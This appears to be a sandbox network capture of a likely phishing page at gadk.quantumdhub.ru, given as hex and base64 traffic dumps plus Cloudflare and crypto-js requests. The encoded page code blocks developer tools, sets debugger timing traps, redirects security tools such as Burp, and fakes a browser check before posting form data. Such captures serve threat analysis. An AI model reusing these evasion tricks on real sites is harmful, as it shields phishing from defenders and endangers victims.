                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 68 4f 57 6b 35 59 57 47 70 48 54 45 73 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 59 7a 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a
                                                                                                                                                                                                                                                          Data Ascii: 10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3hOWk5YWGpHTEsuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTYzcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58
                                                                                                                                                                                                                                                          Data Ascii: 2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZX
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 33 52 55 35 77 52 55 31 71 59 6b 70 6d 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 33 52 55 35 77 52 55 31 71 59 6b 70 6d 49 43 30 67 51 6e 4e 77 53 55 5a 6b 57 6c 46 6a 52 69 41 2b 49 45 52 6c 65 45 46 48 59 56 52 6a 51 6b 38 67 4a 69 59 67 49 55 56 54 61 56 6c 4f 61 6d 5a 7a 62 6c 63 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 70 44 56 33 6c 5a 65 45 68 54 54 58 59 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41
                                                                                                                                                                                                                                                          Data Ascii: bWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCB3RU5wRU1qYkpmID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmICh3RU5wRU1qYkpmIC0gQnNwSUZkWlFjRiA+IERleEFHYVRjQk8gJiYgIUVTaVlOamZzblcpIHsNCiAgICAgICAgICAgIHpDV3lZeEhTTXYgPSB0cnVlOw0KICAgICAgICAgICA
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 61 47 68 6e 57 6e 56 76 54 58 4a 31 59 79 49 2b 44 51 70 57 5a 58 4a 70 5a 6e 6c 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 49 48 52 76 49 47 56 75 63 33 56 79 5a 53 42 68 49 48 4e 6c 59 33 56 79 5a 53 42 76 62 6d 78 70 62 6d 55 67 5a 58 68 77 5a 58 4a 70 5a 57 35 6a 5a 53 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6d
                                                                                                                                                                                                                                                          Data Ascii: HV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iaGhnWnVvTXJ1YyI+DQpWZXJpZnlpbmcgeW91ciBicm93c2VyIHRvIGVuc3VyZSBhIHNlY3VyZSBvbmxpbmUgZXhwZXJpZW5jZS4NCjwvZGl2Pg0KPC9m
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 6a 52 6d 70 6c 57 48 42 53 55 32 6c 55 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49
                                                                                                                                                                                                                                                          Data Ascii: AgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShjRmplWHBSU2lUKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogI
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 20 54 5a 63 61 4b 75 73 72 6e 6b 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 42 6f 6f 54 77 70 79 6d 58 64 20 3f 20 54 5a 63 61 4b 75 73 72 6e 6b 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 54 5a 63 61 4b 75 73 72 6e 6b 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 69 6e 20 77 68 61 74 20 79 6f 75 20 68 61 76 65 2c 20 62 75 74 20 77 68 6f 20 79 6f 75 20 61 72 65 2e 20 2a 2f 0d 0a 69 66 28 64 79 48 49 55 78 42 42 62 67 20 3d 3d 20 42 6f 6f 54 77 70 79 6d 58 64 29 7b 0d 0a 63 6f 6e 73 74 20 7a 4b 74 64 42 49 65 59 76 43 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33
                                                                                                                                                                                                                                                          Data Ascii: TZcaKusrnk.hostname === BooTwpymXd ? TZcaKusrnk.hostname : TZcaKusrnk.hostname.split('.').slice(-2).join('.');/* Success is not in what you have, but who you are. */if(dyHIUxBBbg == BooTwpymXd){const zKtdBIeYvC = window.location.pathname.split('%23
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 33 68 4f 57 6b 35 59 57 47 70 48 54 45 73 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 68 4f 57 6b 35 59 57 47 70 48 54 45 73 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 65 45 35 61 54 6c 68 59 61 6b 64 4d 53 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30
                                                                                                                                                                                                                                                          Data Ascii: mdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI3hOWk5YWGpHTEsgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3hOWk5YWGpHTEsgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojeE5aTlhYakdMSyBwe21hcmdpbi10
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a
                                                                                                                                                                                                                                                          Data Ascii: 5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2Z


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.549718104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC651OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://gadk.quantumdhub.ru/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:49 GMT
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                          location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f537376bdac424c-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.549719104.17.24.144433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC653OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://gadk.quantumdhub.ru/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:49 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                          ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                                                                          Age: 193604
                                                                                                                                                                                                                                                          Expires: Wed, 10 Dec 2025 23:35:49 GMT
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2F8rmMMrYl5ebLfZZFlQqpRaGfcAy4mCmVY73GIQq9CBTOQ3eCZnHWDMI3of7lkN%2FzBAKw%2FqtrhpP0inXn%2F7NJ%2BaIk1TcnGHPh34BTJbK4thtHSRHMRYLHTnh2D0zN%2BCuLPAXzNO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f537376c9434376-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                          Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                                                                                                                                                                                                          Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                                                                                                                                                                                                          Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                                                                                                                                                                                                          Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                                                                                                                                                                                                          Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                                                                                                                                                                                                          Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
